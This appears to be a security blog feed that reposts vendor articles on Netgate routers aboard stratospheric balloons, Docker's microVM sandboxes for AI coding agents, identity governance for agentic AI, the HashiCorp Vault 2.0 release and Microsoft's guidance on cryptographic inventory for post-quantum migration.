Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my companies views.
Disclaimer: some of the links on this site are affiliate links, if you click on them and make a purchase, I make a commission.
At altitudes exceeding 100,000 feet, where temperatures plunge to -80°C and physical access is impossible for months at a time, traditional networking equipment simply fails. But for Aerostar, operating in these extreme conditions isn’t theoretical; it’s mission-critical.
Customer Overview: Aerospace innovators reaching the edge of space
Aerostar, a business unit of TCOM, is a South Dakota-based pioneer in high-altitude balloon and unmanned aerial system (UAS) operations. Aerostar’s platforms support NASA instrumentation testing, government communications relay, disaster response, and commercial applications like environmental monitoring. Their operations require robust, reliable network connectivity in extreme environmental conditions, often at altitudes exceeding 70,000 ft and temperatures below -80°C.
To support these unique missions, Aerostar selected the Netgate® 2100 router with pfSense Plus® for its small footprint, low power consumption, and proven resilience in extreme temperatures, enabling secure, reliable networking for stratospheric payloads.
“The combination of durability, low power, and open-source flexibility made the Netgate 2100 the perfect solution for our high-altitude missions. It’s not just a router, it’s the backbone of our stratospheric networking operations.” Aaron Wyant, Aerostar International LLC
Challenge: Networking where no network has gone before
Aerostar previously relied on Ubiquiti Edge Routers, but end-of-life hardware and growing demands for port density, lower power consumption, and environmental durability necessitated a new solution.
Flights routinely encounter temperatures ranging from -40°C to -80°C, well beyond the capabilities of standard commercial routers.
Limited payload space
Routers must be compact and lightweight to fit within specialized balloon frames or UAS platforms.
High reliability
Networking hardware must remain operational for months with no maintenance, powering payloads via solar panels and batteries.
Complex connectivity
The systems require multiple Ethernet ports, VPN capabilities, and support for a variety of network protocols to handle telemetry, command-and-control (C2), and real-time data streaming.
“Each payload is fully self-contained, powered by solar energy during the day and battery reserves at night, operating for months in the stratosphere with no external power or physical access.”
Aaron Wyant, Aerostar International LLC
Solution: Local LAN, global reach, no matter how high you fly
Aerostar deployed the Netgate 2100s, leveraging pfSense software, for high-altitude and remote networking.
Beneath each balloon sits a payload frame carrying critical instruments. On 90% of balloon flights, Aerostar deploys a router just as you would in any standard network. Recently, they’ve paired a Starlink Mini with the router, providing a WAN interface while all payload devices connect via a local LAN.
The 2100s were paired with industrial-rated switches as needed, creating a modular, mission-ready networking solution suitable for one-time-use balloon flights or longer-duration unmanned aerial missions.
Key features included:
Extreme temperature performance
The 2100 successfully operated in the vacuum chamber, testing down to -80°C, well beyond typical commercial hardware specifications.
Low power consumption
At 4 watts, the 2100 reduced power requirements compared to previous hardware, a critical factor for solar- and battery-powered payloads.
Compact Design
Its small size and lightweight design allowed it to be integrated into balloon payload frames without affecting flight dynamics.
Flexible connectivity
Four LAN ports enabled local networking for payload sensors and instruments, while WAN and VPN capabilities ensured secure communications.
Open-source flexibility
pfSense Plus enabled customization to meet specific telemetry and routing requirements unique to each flight mission.
Results & Benefits: Reliable connectivity at the edge of the stratosphere
With the Netgate 2100, Aerostar achieved:
Reliable networking in extreme environments
Routers maintained operation at stratospheric altitudes with temperatures as low as -80°C for almost a one-year mission
Reduced payload power and weight
Lower power consumption and a compact form factor optimized balloon flight efficiency.
Scalable deployment
Modular design enables quick integration across diverse UAS and balloon platforms.
Enhanced mission capability
Secure, real-time telemetry and command-and-control for NASA instrumentation, government communications, disaster response, and commercial monitoring.
Future readiness
Support for the upcoming TAA certification ensures broader deployment potential across government and commercial missions.
Final Thought
Most networking solutions are designed for controlled environments.
This one wasn’t.
It was built to operate where:
There is no infrastructure
There is no maintenance
And failure isn’t an option
And that’s exactly why it works.
Want to see it in action?
Watch the full mission video and explore how networking is evolving beyond Earth.
About Aerostar
Netgate is proud to support a partner committed to making the world more connected and secure.
Aerostar represents the evolution of innovation in action, building on decades of lighter-than-air expertise to become a leader in high-altitude platforms and advanced manufacturing. Today, Aerostar leverages cutting-edge technology, such as the Netgate 2100 in stratospheric systems, to connect, protect, and support critical missions worldwide, from communications relay to life-saving applications, as it continues to push the boundaries of what’s possible at 70,000-plus feet.
Aerostar has taken lighter-than-air technologies to all new heights by leveraging the most brilliant minds, materials, and machinery for over 70 years to connect, protect, and save lives. Their platforms support NASA, government, and commercial applications worldwide, delivering innovative solutions for data collection, communications, and disaster response.
Netgate develops pfSense software-based routers that deliver enterprise-grade networking, security, and flexibility across commercial, government, and remote applications. pfSense Plus software, the world’s leading firewall, router, and VPN solution, provides secure network edge and cloud networking solutions for millions of deployments worldwide.
About the Netgate 2100 with pfSense Plus
The Netgate 2100 is a compact yet powerful security gateway appliance that pairs purpose-built hardware with the pfSense Plus software platform, delivering enterprise-grade firewall, routing, and VPN capabilities in a small desktop form factor. It features a dual-core ARM Cortex‑A53 CPU, 4 GB DDR4 RAM, and flexible Ethernet connectivity (WAN RJ45/SFP combo plus four LAN ports).
The Netgate 2100 proves its versatility by powering high-altitude balloon payloads and connecting Starlink Mini WAN interfaces to onboard LAN networks, while withstanding extreme temperatures and altitudes. pfSense Plus offers advanced firewall filtering, VPNs, multi-WAN load balancing, IDS/IPS, and detailed traffic management, all managed via an intuitive web interface. With passive cooling, low power draw, and expansion options for additional storage, the Netgate 2100 is a small device capable of delivering reliable, scalable, and secure networking, even at the edge of the stratosphere.
Last week, we launched Docker Sandboxes with a bold goal: to deliver the strongest agent isolation in the market.
This post unpacks that claim, how microVMs enable it, and some of the architectural choices we made in this approach.
The Problem With Every Other Approach
Every sandboxing model asks you to give something up. We looked at the top four approaches.
Full VMs offer strong isolation, but general-purpose VMs weren’t designed for ephemeral, session-heavy agent workflows. Some VMs built for specific workloads can spin up more effectively on modern hardware, but the general-purpose VM experience (slow cold starts, heavy resource overhead) pushes developers toward skipping isolation entirely.
Containers are fast and are the way modern applications are built. But for an autonomous agent that needs to build and run its own Docker containers, which coding agents routinely do, you hit Docker-in-Docker, which requires elevated privileges that undermine the isolation you set up in the first place. Agents need a real Docker environment to do development work, and containers alone don’t give you that cleanly.
WASM / V8 isolates are fast to spin up, but the isolation model is fundamentally different. You’re running isolates, not operating systems. Even providers of isolate-based sandboxes have acknowledged that hardening V8 is difficult, and that security bugs in the V8 engine surface more frequently than in mature hypervisors. Beyond the security model, there’s a practical gap: your agent can’t install system packages or run arbitrary shell commands. For a coding agent that needs a real development environment, WASM isn’t one.
Not using any sandboxing is fast, obviously. It’s also a liability. One rm -rf, one leaked .env, one rogue network call, and the blast radius is your entire machine.
Why MicroVMs
Docker Sandboxes run each agent session inside a dedicated microVM with a private Docker daemon isolated by the VM boundary, and no path back to the host.
That one sentence contains three architectural decisions worth unpacking.
Dedicated microVM. Each sandbox gets its own kernel. It’s hardware-boundary isolation, the same kind you get from a full VM. A compromised or runaway agent can’t reach the host, other sandboxes, or anything outside its environment. If it tries to escape, it hits a wall.
Private, VM-isolated Docker daemon. This is the key differentiator for coding agents. AI is going to result in more container workloads, not fewer. Containers are how applications are developed, and agents need a Docker environment to do that development. Docker Sandboxes give each agent its own Docker daemon running inside a microVM, fully isolated by the VM boundary. Your agent gets full docker build, docker run, and docker compose support with no socket mounting, no host-level privileges, none of the security compromises other approaches require. This means we treat agents as we would a human developer, giving them a true developer environment so they can actually complete tasks across the SDLC.
No path back to the host. File access, network policies, and secrets are defined before the agent runs, not enforced by the agent itself. This is an important distinction. An LLM deciding its own security boundaries is not a security model. The bounding box has to come from infrastructure, not from a system prompt.
Why We Built a New VMM
Choosing microVMs was the easy part. Running them where developers actually work was the hard part.
We looked hard at existing options, but none of them were designed for what we needed. Firecracker, the most well-known microVM runtime, was designed for cloud infrastructure, specifically Linux/KVM environments like AWS Lambda. It has no native support for macOS or Windows, full stop. That’s fine for server-side workloads, but coding agents don’t run in the cloud. They run on developer laptops, across macOS, Windows, and Linux.
We could have shimmed an existing VMM into working across platforms, creating translation layers on macOS and workarounds on Windows, but bolting cross-platform support onto a Linux-first VMM means fighting abstractions that were never designed for it. That’s how you end up with fragile, layered workarounds that break the “it just works” promise and create the friction that makes developers skip sandboxing altogether.
So we built a new VMM, purpose-built for where coding agents actually run.
It runs natively on all three platforms using each OS’s native hypervisor: Apple’s Hypervisor.framework, Windows Hypervisor Platform, and Linux KVM. A single codebase for three platforms and zero translation layers.
This matters because it means agents get kernel-level isolation optimized for each specific OS. Cold starts are fast because there’s no abstraction tax. A developer on a MacBook gets the same isolation guarantees and startup performance as a developer on a Linux workstation or a Windows machine.
Building a VMM from scratch is not a small undertaking. But the alternative, asking developers to accept slower starts, degraded compatibility, or platform-specific caveats, is exactly the kind of asterisk that makes people run agents on the host instead. Our approach removes that asterisk at the hypervisor level.
Fast Cold Starts
We rebuilt the virtualization layer from scratch, optimizing for fast spin up and fast tear downs. Cold starts are fast. This matters for one reason: if the sandbox is slow, developers skip it. Every friction point between “start agent” and “agent is running” is a reason to run on the host instead. With near-instant starts, there is no performance reason to run outside it.
What This Means In Practice
Here’s the concrete version of what this architecture gives you:
Full development environment. Agents can clone repos, install dependencies, run test suites, build Docker images, spin up multi-container services, and open pull requests, all inside the sandbox. Nothing is stubbed out or simulated. Agents are treated as developers and given what they need to complete tasks end to end.
Scoped access, not all-or-nothing. You define the boundary: exactly which files and directories the agent can see, which network endpoints it can reach, and which secrets it receives. Credentials are injected at runtime and outside the MicroVM boundary, never baked into the environment.
Disposable by design. If an agent goes off track, delete the sandbox and start fresh in seconds. There is no state to clean up and nothing to roll back on your host.
Works with every major agent. Claude Code, Codex, OpenCode, GitHub Copilot, Gemini CLI, Kiro, Docker Agent, and next-generation autonomous systems like OpenClaw and NanoClaw. Same isolation, same speed, one sandbox model across all of them.
For Teams
Individual developers can install and run Docker Sandboxes today, standalone, no Docker Desktop license required.
For teams that want centralized filesystem and network policies that can be enforced across an organization and scale sandboxed execution, get in touch to learn about enterprise deployment.
The Tradeoff That Isn’t
The pitch for sandboxing has always come with an asterisk: yes, it’s safer, but you’ll pay for it in speed, compatibility, or workflow friction.
MicroVMs eliminate that asterisk. You get VM-grade isolation with cold starts fast enough that there’s no reason to skip it, and full Docker support inside the sandbox. There is no tradeoff.
Your agents should be running autonomously. They just shouldn’t be running without any guardrails.
Most security models were built around a simple idea: people log in, systems respond, and access is reviewed over time. That idea held up through the shift to cloud and automation. It still mostly works for services and pipelines.
Agentic AI changes that balance, and the gap it creates isn't theoretical. It's operational, compounding, and increasingly easy to miss until something breaks.
How access gets away from you
Here's a scenario that's already playing out across enterprise environments. A user delegates a task to an AI cowork agent — say, pulling data from a CRM, cross-referencing a financial system, and generating a report. Identity is assumed by the cowork agent, the agent completes the task, and everything looks fine.
Except the access path it opened doesn't close cleanly. The role it assumed stays warm. The credential it used gets cached. Three months later, during an incident review, someone asks: which agent did that? Under whose authority? What else did it touch? Nobody can answer with confidence, because at the time, the access looked like a user doing their job.
That's the shape of the problem. Not a dramatic breach, a quiet accumulation of access that nobody explicitly approved, and nobody thought to revoke.
The identity model we built doesn't fit the world we're entering
Traditional identity and access management was built around people. Even when we expanded it to applications and services, the underlying assumptions stayed largely intact: identities were provisioned deliberately; permissions were reviewed periodically, and access decisions were made ahead of time.
Agents don't fit that shape. They request access dynamically. They call new tools. They assume roles. In some cases, they generate credentials to complete a task. Over time, those interactions can create access paths no one explicitly approved, reviewed, or even anticipated, leading to privilege that grows not in one obvious jump, but in small steps that are easy to miss individually and hard to see in aggregate.
This isn't just another form of complexity. It's a fundamentally new kind of identity control gap, and it has two distinct flavors.
The first is delegated access whereagents are acting on behalf of a human, inheriting that user's identity to carry out a task. Copilots and coding assistants work this way. The agent does things the user could do, but the user isn't watching every step. The second is autonomous access whereagents are operating with their own identity, authenticating independently, and taking action outside the scope of any individual user's authority. Infrastructure agents and workflow orchestrators work this way. Both models are legitimate. Both create real governance challenges. And in most environments today, the controls for each are being built separately, inconsistently, or not at all.
A new attack surface
When agents inherit a user's identity, their actions are indistinguishable from a human's. When something goes wrong, there's no clean way to separate intent from execution or what a person approved versus what an agent decided on its own. When agents operate autonomously, they carry their own credentials, which means every agent is a potential target, a potential source of sprawl, and a potential audit gap.
Either way, machine identities already outnumber human ones in most enterprises. Agents accelerate that imbalance. Every workflow needs credentials. Every tool call needs access. When teams are under pressure to move fast, those credentials tend to stick around longer than they should — long-lived, overly permissive, and sometimes shared — because managing uniqueness at scale feels like overhead no one has time for right now.
That's how secrets end up in code; roles accumulate privileges, and access quietly spreads.
Why Day 1 isn't the hard part
Most organizations don't fail at securing the initial deployment. They define roles, plug in existing IAM, and move forward. The failure happens later.
Secrets rotate late, or not at all. Certificates expire unexpectedly. IAM roles quietly accumulate permissions. Remediation happens once, then drifts. And agents make this worse in a specific way. An autonomous system that can modify infrastructure and trigger workflows doesn't just inherit existing gaps, it can reintroduce vulnerabilities that were previously fixed, undoing security work between review cycles without anyone noticing.
When incidents happen, the lack of clear attribution becomes the real problem. Teams struggle to answer basic questions like who authorized this action, which agent executed it, what credentials were used, what changed, and when? For regulated industries, that uncertainty isn't just inconvenient; it can stop an audit in its tracks.
Static controls in a moving system
Most security controls still assume access is something you grant in advance. Once authenticated, a system trusts that identity until something changes.
Agents don't respect that boundary. A delegated agent might legitimately access a system in one moment and, two steps later in its reasoning chain, try to reach something its user never intended to authorize. An autonomous agent might operate across three cloud environments in the span of a single workflow. Context shifts constantly. What was appropriate five minutes ago may not be appropriate now.
This is where existing tools run into their limits. IAM platforms focus on who you are. PAM was built around how humans access systems. Secrets management focuses on storing credentials. None of these were designed for an identity that changes context at machine speed, across environments, with no natural pauses.
Trust can't be a one-time decision in these environments. Identity needs to be verified continuously, not just at login. Access needs to be scoped to the task at hand, not the lifecycle of the agent. Credentials should expire naturally, tied to specific context and purpose, without relying on cleanup processes that run quarterly. And authorization decisions have to happen at the point of action, not when something is provisioned.
Extending zero trust to non-human identities
For teams already working toward zero trust, agentic AI exposes the next gap to close, and it's the gap where existing controls are most likely to fail.
The principles still apply: least privilege, continuous verification, strong identity at the center. What changes is the surface and the speed. Zero trust as most organizations have implemented it was designed for humans authenticating to systems. It assumed a person would log in, establish a session, and do work within that session. Agents don't work in sessions. They work in actions, thousands of them, across environments, triggered by other agents, chained into workflows that no human is watching in real time.
Extending zero trust to agents means every agent has its own verifiable identity, not a shared key or borrowed role. It means access is temporary by default, and when a task ends, permissions should too. It means credentials are short-lived and issued just-in-time, not stored and rotated on a schedule. And it means actions are observable not just as events, but as attributable decisions: which identity authorized this, under what scope, on whose behalf.
That's not a theoretical posture. It's a concrete set of controls that already exist for human-centric workflows like dynamic secrets, certificate-based identity, policy-enforced access, and comprehensive audit logging. The engineering challenge is extending them to cover agents at the scale and speed they operate.
Moving forward without losing control
Agentic AI isn't experimental anymore. Teams are adopting it because it works, and the pressure to move fast is real.
The challenge is that speed creates the conditions for the scenario described at the start of this piece: access that accumulates quietly, through behavior rather than design, until the audit question comes and nobody has a clean answer. That's not a failure of tooling so much as a failure of assumptions. Security models that were built for a world where access was provisioned deliberately and reviewed periodically are now applied to systems that provision dynamically and never stop.
The organizations that will handle this well aren't the ones that slow down adoption. They're the ones that connect identity, access, and execution into a coherent picture where every agent has a clear identity, every action is attributable, and the controls are enforced at the moment work happens, not the moment it's reviewed.
That's how autonomy becomes something you can actually rely on. Not because you're watching everything, but because the system itself knows what it should and shouldn't do, and leaves a clear record either way.
Vault Enterprise 2.0 is now generally available, delivering new capabilities to help organizations secure, scale, and simplify secrets management across modern infrastructure. This release strengthens identity-based access, improves credential lifecycle automation, and enables high-performance encryption for emerging workloads, while continuing to enhance usability and integrations across the ecosystem.
Key features in Vault Enterprise 2.0 include:
Secret distribution with workload identity federation to eliminate reliance on long-lived static credentials and improve security across hybrid and multi-cloud environments
Expanded credential rotation capabilities for Linux to reduce operational risk and enforce short-lived access
Envelope encryption for streaming and large-scale workloads to enable high-performance data protection without sacrificing centralized control
Enhanced integrations with Terraform, Kubernetes, and public certificate authorities to streamline infrastructure and application workflows
Improved user experience with a redesigned UI and guided onboarding to accelerate time to value and simplify Vault adoption
Adoption of a new versioning pattern and support model
HashiCorp Vault is transitioning to a new release and support model aligned with IBM versioning and lifecycle practices, which is why the product is moving directly from version 1.21 to 2.0.0. This shift does not reflect a significant change in Vault architecture, as such version changes would normally represent, but rather reflects a move away from HashiCorp’s previous long-term support approach, and toward the IBM Support Cycle-2 policy, which is designed to provide clearer lifecycle expectations. Under this model, each major (“V”) milestone release will receive at least two years of standard support, with extended support options available to ensure continuity for mission-critical workloads. Extended support includes an initial third year with critical bug fixes, usage support, and select security updates, followed by ongoing support (years four through six) for usage guidance and known issue assistance. This approach delivers a more predictable and durable support framework while aligning Vault with the broader IBM product lifecycle strategy. For more detail on IBM versioning and support patterns, see: IBM Software product versioning explained and IBM Software Support Lifecycle Policies.
Vault Enterprise leads in securing human and non-human identities
Identity management with Vault continues to evolve with new capabilities that support centralized policy management, reduce risks from long-lived secrets with improved rotation, and enforce traceability for increased auditability and transparency.
Smarter rotation and simplified role management
Local account password rotation for RHEL, Ubuntu and additional Linux distributions is now generally available. With this capability, engineers and platform teams that use Vault can set secret management policies that reduce credential complexity and set rotation and lease time periods, as well as other criteria that limit breaches’ blast radius and impact at a policy-level.
Systems administrators now have central control of user account credentials on local Linux systems. Previously, they would have a gap in control, as local root users might use a common password shared across systems. Now, with password management in Vault, access to these systems can be controlled and audited, and overall risk is limited by unique time-bound passwords for each system.
In addition, systems administrators who need to manage thousands of machines across various data centers can rely on automation to update local account passwords without manually logging it for each system they manage. Automating this critical security task improves the overall posture by reducing the risk of manual errors and adding auditability for compliance reporting, key for continued acceleration and securing the growing number of machines.
Vault operators will now benefit from seamless Vault onboarding that will not require maintenance windows. Each account will now be able to rotate its own credentials, and Vault operators will have fine-grained control over automatic rotation of LDAP account passwords. This reduces the burden of managing privileged accounts and decreases the blast radius of credential exposure for static roles.
Secure streaming workloads on the edge with in-place encryption
Vault Enterprise 2.0 also introduces enhanced support for encrypting large artifacts and streaming workloads in Vault to enable envelope encryption with the Transit secrets engine. Rather than sending full payloads to Vault, applications can now encrypt data locally using ephemeral key encryption keys (KEKs), while Vault continues to manage and protect those keys through centralized policy and access controls. This approach preserves Vault as the root of trust while significantly improving performance, scalability, and efficiency for high-throughput and large-scale data processing use cases.
These capabilities are already being applied in real-world scenarios, such as with ariso.ai, where Vault serves as the centralized key management layer while encryption occurs at the edge across distributed AI pipelines. This allows organizations to scale encryption alongside data-intensive workloads without introducing bottlenecks, while still enforcing strong governance and security policies. As part of this release, envelope encryption positions Vault to better support modern AI and streaming architectures by combining centralized control with distributed execution.
Scale secret distribution with identity-first access and secret sync
Organizations managing secrets across hybrid and multi-cloud environments often rely on long-lived static credentials, such as IAM access keys, service principals, or service account keys, to enable integrations like secret synchronization. While functional, this model creates significant security and operational challenges: increased blast radius if credentials are leaked, manual rotation overhead, risk of silent failures due to expiration, and widespread credential sprawl across systems and teams. These issues are increasingly at odds with modern security mandates that prioritize short-lived, identity-based access and zero trust principles.
Vault Enterprise 2.0 addresses these challenges by introducing workload identity federation to secret sync, replacing static credentials with short-lived, dynamically exchanged tokens based on trusted identity. This approach eliminates the need to store or rotate credentials, reduces risk exposure, and aligns secret distribution with cloud-native authentication models across AWS, Azure, and GCP. The result is stronger security, improved reliability, and simplified operations, enabling organizations to securely scale secret management, support non-human and agentic workloads, and maintain compliance without adding operational burden.
Secure workload identity with the SPIFFE secrets engine
A new SPIFFE secrets engine is generally available with Vault Enterprise 2.0. Organizations whose workloads rely on SPIFFE can now use tokens issued directly by Vault. With this release, JWT SVID identity tokens can now be requested after successful authentication with Vault. Reinforcing short-lived JWT SVIDs with automatically rotated identities reduces risks associated with long-lived tokens and missed rotations due to manual processes, and decreases blast radius in the event of a token leak.
As Vault continues to set the pace for leading in non-human identity management, capabilities that support fine-grained workload access control enhance organizations’ capacity to secure ephemeral workloads. The SPIFFE secrets engine simplifies operations across heterogeneous environments and continues to strengthen identity guarantees for non-human workloads. Secure, short-lived, and verifiable identities for workloads practically scale the application of zero trust principles, especially in cloud-native environments. Lighter weight and more portable workload identities integrate more smoothly in these modern systems.
Vault continues to reinforce optimized security operations
Unified, automated approach to public and private certificates
Customers can now request and manage public PKI certificates through Vault, which will track and manage the request to a public CA. This capability provides increased support for teams that need to deliver services secured with publicly trusted certificates while continuing to move at the speed of development. Platform teams can now take advantage of an integrated workflow within Vault to manage both privately and publicly issued certificates for increased operational efficiency.
Reduced operations costs with SCIM integrations
Currently in public beta, SCIM server support lets users connect Vault with any SCIM-compliant identity provider. SCIM clients such as SailPoint, Okta, and more are better integrated for improved group and user lifecycle management. SCIM integration allows Vault operators more flexibility by reducing the manual process for syncing users, groups, and group memberships to Vault. Deprovisioning via policy rather than manual process mitigates the risks of persistent user credentials. Teams working toward more consistent and centralized governance can depend on SCIM integration to do so with this Vault capability and can access this beta feature in Vault 2.0.
Expanding support for Terraform ephemeral resources
Bridging secure lifecycle management with infrastructure lifecycle management, improvements to the Terraform Vault provider enhance Vault infrastructure as code and secure secret consumption. With these improvements, managing Vault (e.g. auth methods, secret engines and policies) via Terraform further ensures consistency, repeatability and auditability of secrets management for infrastructure and the applications that depend on it. Teams gain even more efficiencies across the infrastructure with Vault-backed secret retrieval during provisioning, without hardcoding and with automated credential rotation.
Enhancing the Vault UI for discoverability and usability
Vault Enterprise 2.0 introduces an enhanced UI with a guided onboarding experience that helps teams configure foundational features quickly and correctly. New and returning users are directed toward recommended Vault usage faster, with a curated startup path that accelerates time to value.
The onboarding wizard is now generally available and is designed to evolve beyond initial setup, with additional wizards planned to make Vault guidance an ongoing experience rather than a one-time task.
Contextual and embedded enhancements have also been introduced to support better feature discoverability. The support and documentation that previously lived only in Vault developer documents are now being delivered in-product, so users don’t need to leave Vault to learn how to use Vault.
Adoption can be accelerated when teams get the right help. The visual policy generator is also generally available and helps teams create secure policies without writing JSON or HCL from scratch. This reduces the learning curve for new users and administrators and improves efficiencies with consistent and recommended policy patterns across teams that use Vault.
Vault Enterprise 2.0 upgrade details
Vault Enterprise 2.0 delivers meaningful advancements in identity lifecycle automation, workload interoperability, usability, onboarding, and operational transparency. These improvements lower barriers to adoption while strengthening Vault’s core mission: secure, reliable, consistent secrets and identity management at enterprise scale.
You can explore the full list of updates, including those that are available in Community Edition, by reviewing the Vault 2.0 changelog.
As with previous releases, we recommend testing new releases in staging or isolated environments before deploying them to production. If you encounter any issues, please report them via the Vault GitHub issue tracker or start a discussion in the Vault community forum. If you believe you have discovered a security vulnerability, please report it responsibly by emailing security@hashicorp.com Avoid using public channels for security issues. For details, refer to our security policy and PGP key.
To learn more about HCP Vault or Vault Enterprise, visit the Vault product page.
from HashiCorp Blog https://ift.tt/S7gxU81
via IFTTT
Post-quantum cryptography (PQC) is coming—and for most organizations, the hardest part won’t be choosing new algorithms. It will be finding where cryptography is used today across applications, infrastructure, devices, and services so teams can plan, prioritize, and modernize with confidence. At Microsoft, we view this as the practical foundation of quantum readiness: you can’t protect or migrate what you can’t see.
As described in our Quantum Safe Program strategy, cryptography is embedded in all modern IT environments across every industry: in applications, network protocols, cloud services, and hardware devices. It also evolves constantly to ensure the best protection from newly discovered vulnerabilities, evolving standards from bodies like NIST and IETF, and emerging regulatory requirements. However, many organizations face a widespread challenge: without a comprehensive inventory and effective lifecycle process, they lack the visibility and agility needed to keep their infrastructure secure and up to date. As a result, when new vulnerabilities or mandates emerge, teams often struggle to quickly identify affected assets, determine ownership, and prioritize remediation efforts. This underscores the importance of establishing clear, ongoing inventory practices as a foundation for resilient management across the enterprise.
The first and most critical step toward a quantum-safe future—and sound cryptographic hygiene in general—is building a comprehensive cryptographic inventory. PQC adoption (like any cryptographic transition) is ultimately an engineering and operations exercise: you are updating cryptography across real systems with real dependencies, and you need visibility to do it safely.
In this post, we will define what a cryptographic inventory is, outline a practical customer-led operating model for managing cryptographic posture, and show how customers can start quickly using Microsoft Security capabilities and our partners.
A cryptographic inventory is a living catalog of all the cryptographic assets and mechanisms in use across your organization. This includes the following examples:
Category
Examples/Details
Certificates and keys
X.509 certificates, private/public key pairs, certificate authorities, key management systems
Protocols and cipher suites
TLS/SSL versions and configurations, SSH protocols, IPsec implementations
Cryptographic libraries
OpenSSL, LibCrypt, SymCrypt, other libraries embedded in applications
Active network sessions using encryption, protocol handshake details
Secrets and credentials
API keys, connection strings, service principal credentials stored in code, configuration files, or vaults
Hardware security modules (HSMs)
Physical and virtual HSMs, Trusted Platform Modules (TPMs)
Why does this inventory matter? First, governance and compliance: 15 countries and the EU recommend or require some subset of organizations to do cryptographic inventorying. These are implemented through regulations like DORA, government policies like OMB M-23-02, and industry security standards like PCI DSS 4.0. We expect the number and scope of these polices to grow globally.
Second, risk prioritization: Cryptographic assets present varying levels of risk. For example, an internet-facing TLS endpoint using weak ciphers poses different threats compared to an internal test certificate, or local disk encryption utilizing the AES standard. Maintaining a comprehensive inventory enables effective assessment of exposure and facilitates the prioritization of remediation efforts, ensuring that risk-based decisions incorporate live telemetry and data sensitivity.
Third, it helps enable crypto agility: When a vulnerability is discovered in an encryption algorithm, an inventory can tell you exactly what needs updating and where.
Cryptography Posture Management (CPM) is not a single product, it’s an ongoing lifecycle that customers build and maintain using a combination of tools, integrations, and processes. Many organizations are building Quantum Safe Programs as a broader umbrella for cryptographic readiness. Whether or not you use that exact label, the technical foundation tends to look the same:
Define what you are managing (the inventory scope and critical assets).
Define how you make decisions (risk assessment and prioritization).
Define how you execute change safely (remediation and validation).
Define how you keep it current (continuous monitoring).
Diagram illustrating a customer-led CPM cycle with six stages: Discover, Normalize, Assess risk, Prioritize, Remediate, and Continuous monitoring, arranged in a circular flow with arrows indicating process direction.
This is where CPM is best understood as a lifecycle you run continuously:
Discover: Collect cryptographic signals from across your environment – code repositories, runtime environments, network traffic, and storage systems.
Normalize: Aggregate signals into a unified inventory with consistent data schema (certificate thumbprints, algorithm types, key lengths, and expiration dates).
Assess Risk: Evaluate cryptographic assets against policy baselines, industry standards, and known vulnerabilities. Identify weak algorithms, expired certificates, and non-compliant configurations.
Prioritize: Rank findings by risk based on asset criticality, exposure (internal vs. internet-facing), and compliance requirements.
Remediate: Rotate keys, update libraries, reconfigure protocols, and replace weak algorithms—using available automation and tooling.
Continuous Monitoring: Continuously track changes. New code commits, certificate renewals, configuration drift, and emerging vulnerabilities all require ongoing vigilance.
Diagram illustrating a customer-led CPM cycle with four phases: Preparation, Understanding, Planning & Execution, and Monitoring & Evaluation, arranged in a circular flow with arrows indicating process direction.
You can apply the lifecycle above across four domains: code, network, runtime, and storage:
Code: Cryptographic primitives and libraries in source code, detected through source code analysis.
Storage: Certificates, keys, and secrets stored on disk, in databases, in key vaults, or configuration files.
Network: Encrypted traffic sessions, TLS/SSH handshakes, cipher suite negotiations.
Runtime: In-memory usage of cryptographic libraries, active key material, process-level crypto operations.
A diagram outlining the steps of the CPM cycle, including risk assessment, planning, execution, normalization, prioritization, preparation, discovery, remediation, and continuous monitoring, with connections to the four components of code, storage, networks, and runtime.
Since the operating model is broad across multiple signals with no single team or platform, ensure you define clear ownership for each stage, with consistent inputs and measurable outputs. That’s why a “one-and-done” scan rarely holds up. The environment changes constantly new deployments, new libraries, renewed certificates, new endpoints, and new policies. The path that scales is an operating model, not a one-time project. By organizing your approach around these domains, you can systematically identify gaps, leverage the right tools for each domain, and build a holistic view of your cryptographic posture.
Building your inventory with Microsoft tools
You don’t have to start from scratch. Many organizations already have Microsoft Security and Azure capabilities deployed that can generate cryptographic signals across code, endpoints, cloud workloads, and networks. The goal is to connect and normalize those signals into an inventory that supports risk-based decisions—then extend coverage with partner solutions where you need deeper visibility, automation, or multi-vendor reach:
Microsoft Tool
Cryptographic Signals
Domain Coverage
Public Documentation
GitHub Advanced Security (GHAS)
Identifies cryptographic algorithm artifacts in code via CodeQL
Microsoft Defender for Vulnerability Management (MDVM)
Certificate inventory from devices with MDE agents, including asymmetric keys algorithm details; detects cryptographic libraries and their vulnerabilities
Code Domain: Activate GitHub Advanced Security for your repositories. Use CodeQL queries to scan for cryptographic algorithm usage, and export results for central oversight.
Runtime and Storage Domain: Deploy Microsoft Defender for Endpoint and Defender Vulnerability Management across your endpoints. Use the certificate inventory feature to discover certificates and their associated algorithms. Review vulnerable cryptographic libraries flagged by MDVM.
Network Domain: Enable network protection in MDE to identify encrypted sessions. If you’re using Azure, configure Azure Network Watcher to capture traffic metadata and identify encrypted flows.
Storage Domain: Audit your Azure Key Vault instances to inventory secrets, keys, and certificates. Use Defender for Cloud secret scanning to detect exposed keys in IaaS and PaaS resources.
Normalize & Centralize: Bring outputs together in a common view and schema for tracking (for example, in a security data platform or SIEM such as Microsoft Sentinel). Many teams start with supported exports/connectors and existing reporting workflows—then mature toward automation and governed data pipelines as the program scales. The goal is a single, queryable inventory that teams can operate.
Assess & Prioritize: Define your cryptographic policy baselines (e.g., minimum key lengths, approved algorithms, certificate expiration thresholds). Compare your inventory against these baselines and prioritize based on risk.
This approach leverages tools many organizations already have deployed, providing a pragmatic starting point without requiring significant new investment.
Accelerating your journey with the partner ecosystem
As organizations progress from initial cryptographic inventory to ongoing posture management, Microsoft partners with leading CPM providers to deliver comprehensive solutions that address complex environments across code, infrastructure, devices, applications, and both cloud and on-premises systems. These integrated CPM solutions—running on Azure and deeply connected with the Microsoft Security platform—enable holistic inventory, visibility, and risk assessment by collecting cryptographic signals from Microsoft and non-Microsoft sources, supporting industries with stringent regulatory demands and complex legacy estates, and providing unified management, guided remediation, and quantum security readiness at scale.
Microsoft partners such as Keyfactor, Forescout, Entrust, and Isara, have CPM solutions available today. Each partner delivers unique capabilities spanning certificate and key lifecycle management, network visibility, software supply chain, and code analysis. Together, this growing ecosystem gives customers the flexibility to adopt CPM solutions integrated with the Microsoft Security platform that support a broad range of customer scenarios and align to your architecture, risk profile, and operational maturity.
